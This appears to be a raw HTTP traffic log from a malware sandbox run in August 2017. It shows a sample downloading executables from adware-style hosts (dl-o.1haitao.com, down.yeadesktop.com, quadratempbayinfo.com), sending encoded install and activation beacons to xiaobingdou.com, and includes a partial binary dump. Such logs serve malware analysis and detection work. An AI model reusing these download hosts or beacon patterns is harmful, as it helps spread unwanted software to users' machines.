: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /20002.exe HTTP/1.1

Accept: */*

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: dl-o.1haitao.com


HTTP/1.1 200 OK

Server: Tengine

Content-Type: application/x-msdownload

Content-Length: 1339016

Connection: keep-alive

Date: Wed, 16 Aug 2017 14:05:07 GMT

x-oss-request-id: 59945113F4D4EC5D03C6CFF9

Accept-Ranges: bytes

ETag: "680D0B8CE81A562A0C5D5BD98FCA3B04"

Last-Modified: Tue, 08 Aug 2017 06:29:07 GMT

x-oss-object-type: Normal

x-oss-hash-crc64ecma: 2922808158989109942

x-oss-storage-class: Standard

Content-MD5: aA0LjOgaVioMXVvZj8o7BA==

x-oss-server-time: 1

Via: cache34.l2de1[459,304-0,H], cache35.l2de1[2796,0], cache3.de1[0,200-0,H], cache4.de1[0,0]

Age: 2126

X-Cache: HIT TCP_MEM_HIT dirn:0:761339685

X-Swift-SaveTime: Wed, 16 Aug 2017 14:05:07 GMT

X-Swift-CacheTime: 3600

Timing-Allow-Origin: *

EagleId: c31b1fcc15028944335665385e

MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........0(..QF..QF.
.QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...i:
.V.................^..........l2.......p....@.........................
.................................................t..........(.........
..8"..PL...........................................................p..
|............................text...t\.......^.................. ..`.r
data.......p.......b..............@..@.data...X............t..........
....@....ndata.......P...........................rsrc...(............z
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
.h?B..H.P.u..u..u....q@..B...SV.5p?B..E.WP.u....q@..e...E..E.P.u....q@
..}..e....Pp@........FR..VV..U... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Xp@..E...E.P.E.P.u....r@..u
....E..9}...w....~X.te.v4..Hp@....E.tU.}.j.W.E......E.......Dp@..vXW..
Lp@..u..5@p@.W...E..E.h ...Pj.h`7B.W...r@..u.W...u....E.P.u...Pr@._^3.
[.....L$...?B...Si.....VW.T.....tO.q.3.;5.?B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5.?B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /reportInstallaa.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MDhDNzg5MTZDNjhDRUVFNTg3NjVDMkZBMjVFNDU5NjU4MTZEMEYzOTY3MkZCNkE5NUMzOUNDNkQxNTE2M0Q5NTlEQzMyNDg4N0VGRUE3Q0FBNEM5NTNERTQwNjlDMjYxMzMyQTY1NzhBODFENzAzMDc0NDM2QzQ0OUQwODc0QTZCRDcwMjM0OTAyQzY3NTY0MzBCMjYxMDBGQUQ5QkU5MTM2OTMxM0M1N0JBMkI1QzQ3QjkxOUM5NzNFNTg1NDI0 HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: xiaobingdou.com


HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:26 GMT

Connection: close

Content-Length: 0

GET /get.aspx?url=hXXp://VVV.yeadesktop.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:24 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /get.aspx?url=hXXp://VVV.yeadesktop.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:25 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /get.aspx?url=hXXp://qtipr.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:32 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /get.aspx?url=hXXp://yeadesktopbr.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:38 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /jihuo.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQxNUY5M0U4RTk1NUQ5RTc2RTMyNDUxOUQ5RkI5Nzg5MjIwRDc5QzBBNDM2NDk2ODgxRDAwQjczRjcxRjlFRkM3Nzg1NDlFMjY0RUI4MTg4NjBEQjVBODFGMTk0OUY1QTVBRTkyREQ1Njk0N0ZBNTA5MUVCNTFGNzJDRjkzNTYyMjhFQzc4RjJGRDE1NTg1MUYzRTBDQTlGNUZGOEM4MTkx HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: xiaobingdou.com


HTTP/1.1 200 OK

Cache-Control: private

Content-Type: text/html

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:32 GMT

Connection: close

Content-Length: 0

GET /offer/msiql.exe HTTP/1.1

Accept: */*

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: down.yeadesktop.com

Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 403 Forbidden

Date: Wed, 16 Aug 2017 14:40:20 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Cache-Control: max-age=10

Expires: Wed, 16 Aug 2017 14:40:30 GMT

X-Frame-Options: SAMEORIGIN

Server: cloudflare-nginx

CF-RAY: 38f525f091b08b1c-KBP
ce3..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no-
js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
    <html class="no-js ie7 oldie" lang="en-US"> <![endif]--&g
t;.<!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-U
S"> <![endif]-->.<!--[if gt IE 8]><!--> <html 
class="no-js" lang="en-US"> <!--<![endif]-->.<head>.
<title>Access denied | down.yeadesktop.com used Cloudflare to re
strict access</title>.<meta charset="UTF-8" />.<meta ht
tp-equiv="Content-Type" content="text/html; charset=UTF-8" />.<m
eta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<
meta name="robots" content="noindex, nofollow" />.<meta name="vi
ewport" content="width=device-width,initial-scale=1,maximum-scale=1" /
>.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/style
s/cf.errors.css" type="text/css" media="screen,projection" />.<!
--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href
="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,proj
ection" /><![endif]-->.<style type="text/css">body{marg
in:0;padding:0}</style>.<!--[if lte IE 9]><script type=
"text/javascript" src="/cdn-cgi/scripts/jquery.min.js"></script&
gt;<![endif]-->.<!--[if gte IE 10]><!--><script t
ype="text/javascript" src="/cdn-cgi/scripts/zepto.min.js"></scri
pt><!--<![endif]-->.<script type="text/javascript" <<< skipped >>>

GET /offer/msiql.exe HTTP/1.1

Accept: */*

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: down.yeadesktop.com

Cookie: __cfduid=d925b57e7ca3561034abea56a5bcf1b0a1502894419


HTTP/1.1 403 Forbidden

Date: Wed, 16 Aug 2017 14:40:20 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Cache-Control: max-age=10

Expires: Wed, 16 Aug 2017 14:40:30 GMT

X-Frame-Options: SAMEORIGIN

Server: cloudflare-nginx

CF-RAY: 38f525ee315c8b1c-KBP
ce3..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no-
js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
    <html class="no-js ie7 oldie" lang="en-US"> <![endif]--&g
t;.<!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-U
S"> <![endif]-->.<!--[if gt IE 8]><!--> <html 
class="no-js" lang="en-US"> <!--<![endif]-->.<head>.
<title>Access denied | down.yeadesktop.com used Cloudflare to re
strict access</title>.<meta charset="UTF-8" />.<meta ht
tp-equiv="Content-Type" content="text/html; charset=UTF-8" />.<m
eta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<
meta name="robots" content="noindex, nofollow" />.<meta name="vi
ewport" content="width=device-width,initial-scale=1,maximum-scale=1" /
>.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/style
s/cf.errors.css" type="text/css" media="screen,projection" />.<!
--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href
="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,proj
ection" /><![endif]-->.<style type="text/css">body{marg
in:0;padding:0}</style>.<!--[if lte IE 9]><script type=
"text/javascript" src="/cdn-cgi/scripts/jquery.min.js"></script&
gt;<![endif]-->.<!--[if gte IE 10]><!--><script t
ype="text/javascript" src="/cdn-cgi/scripts/zepto.min.js"></scri
pt><!--<![endif]-->.<script type="text/javascript" <<< skipped >>>

GET /data/webfriend2.exe HTTP/1.1

Accept: */*

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: quadratempbayinfo.com


HTTP/1.1 302 Found

Location: exefiles/webfriend1502893460.exe

Content-Type: text/html; charset=UTF-8

Content-Length: 0

Date: Wed, 16 Aug 2017 14:41:10 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Connection: Keep-Alive

HTTP/1.1 302 Found..Location: exefiles/webfriend1502893460.exe..Conten
t-Type: text/html; charset=UTF-8..Content-Length: 0..Date: Wed, 16 Aug
 2017 14:41:10 GMT..Accept-Ranges: bytes..Server: LiteSpeed..Cache-Con
trol: no-cache, no-store, must-revalidate, max-age=0..Connection: Keep
-Alive......

GET /data/webfriend2.exe HTTP/1.1

Accept: */*

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: quadratempbayinfo.com


HTTP/1.1 302 Found

Location: exefiles/webfriend1502893460.exe

Content-Type: text/html; charset=UTF-8

Content-Length: 0

Date: Wed, 16 Aug 2017 14:41:10 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Connection: Keep-Alive

....

GET /data/webfriend2.exe HTTP/1.1

Accept: */*

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: quadratempbayinfo.com


HTTP/1.1 302 Found

Location: exefiles/webfriend1502893460.exe

Content-Type: text/html; charset=UTF-8

Content-Length: 0

Date: Wed, 16 Aug 2017 14:41:10 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Connection: Keep-Alive

....

GET /data/webfriend2.exe HTTP/1.1

Accept: */*

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: quadratempbayinfo.com


HTTP/1.1 302 Found

Location: exefiles/webfriend1502893460.exe

Content-Type: text/html; charset=UTF-8

Content-Length: 0

Date: Wed, 16 Aug 2017 14:41:10 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Connection: Keep-Alive

HTTP/1.1 302 Found..Location: exefiles/webfriend1502893460.exe..Conten
t-Type: text/html; charset=UTF-8..Content-Length: 0..Date: Wed, 16 Aug
 2017 14:41:10 GMT..Accept-Ranges: bytes..Server: LiteSpeed..Cache-Con
trol: no-cache, no-store, must-revalidate, max-age=0..Connection: Keep
-Alive......

GET /data/webfriend2.exe HTTP/1.1

Accept: */*

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: quadratempbayinfo.com


HTTP/1.1 302 Found

Location: exefiles/webfriend1502893460.exe

Content-Type: text/html; charset=UTF-8

Content-Length: 0

Date: Wed, 16 Aug 2017 14:41:10 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Connection: Keep-Alive

HTTP/1.1 302 Found..Location: exefiles/webfriend1502893460.exe..Conten
t-Type: text/html; charset=UTF-8..Content-Length: 0..Date: Wed, 16 Aug
 2017 14:41:10 GMT..Accept-Ranges: bytes..Server: LiteSpeed..Cache-Con
trol: no-cache, no-store, must-revalidate, max-age=0..Connection: Keep
-Alive......

GET /data/webfriend2.exe HTTP/1.1

Accept: */*

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: quadratempbayinfo.com


HTTP/1.1 302 Found

Location: exefiles/webfriend1502893460.exe

Content-Type: text/html; charset=UTF-8

Content-Length: 0

Date: Wed, 16 Aug 2017 14:41:10 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Connection: Keep-Alive

....

GET /data/webfriend2.exe HTTP/1.1

Accept: */*

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: quadratempbayinfo.com


HTTP/1.1 302 Found

Location: exefiles/webfriend1502893460.exe

Content-Type: text/html; charset=UTF-8

Content-Length: 0

Date: Wed, 16 Aug 2017 14:41:10 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Connection: Keep-Alive

....

GET /data/webfriend2.exe HTTP/1.1

Accept: */*

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: quadratempbayinfo.com


HTTP/1.1 302 Found

Location: exefiles/webfriend1502893460.exe

Content-Type: text/html; charset=UTF-8

Content-Length: 0

Date: Wed, 16 Aug 2017 14:41:11 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Connection: Keep-Alive

HTTP/1.1 302 Found..Location: exefiles/webfriend1502893460.exe..Conten
t-Type: text/html; charset=UTF-8..Content-Length: 0..Date: Wed, 16 Aug
 2017 14:41:11 GMT..Accept-Ranges: bytes..Server: LiteSpeed..Cache-Con
trol: no-cache, no-store, must-revalidate, max-age=0..Connection: Keep
-Alive......

GET /data/webfriend2.exe HTTP/1.1

Accept: */*

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: quadratempbayinfo.com


HTTP/1.1 302 Found

Location: exefiles/webfriend1502893460.exe

Content-Type: text/html; charset=UTF-8

Content-Length: 0

Date: Wed, 16 Aug 2017 14:41:11 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Connection: Keep-Alive

....

GET /data/webfriend2.exe HTTP/1.1

Accept: */*

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: quadratempbayinfo.com


HTTP/1.1 302 Found

Location: exefiles/webfriend1502893460.exe

Content-Type: text/html; charset=UTF-8

Content-Length: 0

Date: Wed, 16 Aug 2017 14:41:11 GMT

Accept-Ranges: bytes

Server: LiteSpeed

Cache-Control: no-cache, no-store, must-revalidate, max-age=0

Connection: Keep-Alive

HTTP/1.1 302 Found..Location: exefiles/webfriend1502893460.exe..Conten
t-Type: text/html; charset=UTF-8..Content-Length: 0..Date: Wed, 16 Aug
 2017 14:41:11 GMT..Accept-Ranges: bytes..Server: LiteSpeed..Cache-Con
trol: no-cache, no-store, must-revalidate, max-age=0..Connection: Keep
-Alive..

GET /offer/msiql.exe HTTP/1.1

Accept: */*

User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)

Host: down.yeadesktop.com

Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 403 Forbidden

Date: Wed, 16 Aug 2017 14:40:20 GMT

Content-Type: text/html; charset=UTF-8

Transfer-Encoding: chunked

Connection: keep-alive

Cache-Control: max-age=10

Expires: Wed, 16 Aug 2017 14:40:30 GMT

X-Frame-Options: SAMEORIGIN

Server: cloudflare-nginx

CF-RAY: 38f525f216e58b52-KBP
ce3..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no-
js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
    <html class="no-js ie7 oldie" lang="en-US"> <![endif]--&g
t;.<!--[if IE 8]>    <html class="no-js ie8 oldie" lang="en-U
S"> <![endif]-->.<!--[if gt IE 8]><!--> <html 
class="no-js" lang="en-US"> <!--<![endif]-->.<head>.
<title>Access denied | down.yeadesktop.com used Cloudflare to re
strict access</title>.<meta charset="UTF-8" />.<meta ht
tp-equiv="Content-Type" content="text/html; charset=UTF-8" />.<m
eta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<
meta name="robots" content="noindex, nofollow" />.<meta name="vi
ewport" content="width=device-width,initial-scale=1,maximum-scale=1" /
>.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/style
s/cf.errors.css" type="text/css" media="screen,projection" />.<!
--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href
="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,proj
ection" /><![endif]-->.<style type="text/css">body{marg
in:0;padding:0}</style>.<!--[if lte IE 9]><script type=
"text/javascript" src="/cdn-cgi/scripts/jquery.min.js"></script&
gt;<![endif]-->.<!--[if gte IE 10]><!--><script t
ype="text/javascript" src="/cdn-cgi/scripts/zepto.min.js"></scri
pt><!--<![endif]-->.<script type="text/javascript" <<< skipped >>>

GET /get.aspx?url=hXXp://qtipr.com/ HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error

Cache-Control: private

Content-Type: text/html; charset=utf-8

Server: Microsoft-IIS/7.5

X-AspNet-Version: 4.0.30319

X-Powered-By: ASP.NET

Date: Wed, 16 Aug 2017 14:40:32 GMT

Connection: close

Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <<<< skipped >>>

GET /js/geo2.js HTTP/1.1

Content-Length: 0

Connection: Close

User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36

Host: cdn3.optimizely.com


HTTP/1.1 200 OK

Server: AmazonS3

Content-Length: 290

Content-Type: application/javascript

x-amz-id-2: gGAU2mEDtFFvD7ycmQ E V25vxWoHcSj5N37VNBlmtwFFNAgc4qEruHqt1etulj0 b833Mqb9Nw=

x-amz-version-id: Y1BKPK.c9lIaZx2uYj8JMWZye_vJfrh9

ETag: "adadfc5d7afd13e353d9d52cec1c7827"

x-amz-request-id: 0B414A2AB6ACE923

Cache-Control: max-age=82735

Date: Wed, 16 Aug 2017 14:40:17 GMT

Connection: close
(function(){.  window['optimizely'] = window['optimizely'] || [];.  wi
ndow['optimizely'].push(['activateGeoDelayedExperiments', {.    'locat
ion':{.      'city': "KHARKIV",.      'continent': "EU",.      'countr
y': "UA",.      'region': "".    },.    'ip':"194.242.96.218".  }]);.}
).//.()..;..

GET /offer/service.exe HTTP/1.1

User-Agent: Agent336712

Host: down.yeadesktop.com

Cache-Control: no-cache


HTTP/1.1 404 Not Found

Date: Wed, 16 Aug 2017 14:40:20 GMT

Content-Type: text/html

Transfer-Encoding: chunked

Connection: keep-alive

Set-Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419; expires=Thu, 16-Aug-18 14:40:19 GMT; path=/; domain=.yeadesktop.com; HttpOnly

Server: cloudflare-nginx

CF-RAY: 38f525ebb5b3842a-KBP
48b..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http
://VVV.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="ht
tp://VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Co
ntent-Type" content="text/html; charset=gb2312"/>..<title>404
 - ..................</title>..<style type="text/css">..&l
t;!--..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvet
ica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15p
x;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;mar
gin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#00
0000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-f
amily:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-colo
r:#555555;}..#content{margin:0 0 0 2%;position:relative;}...content-co
ntainer{background:#FFF;width:96%;margin-top:8px;padding:10px;position
:relative;}..-->..</style>..</head>..<body>..<
div id="header"><h1>..........</h1></div>..<di
v id="content">.. <div class="content-container"><fieldset
>..  <h2>404 - ..................</h2>..  <h3>...
...................................................</h3>.. </
fieldset></div>..</div>..</body>..</html>..
0..<<< skipped >>>

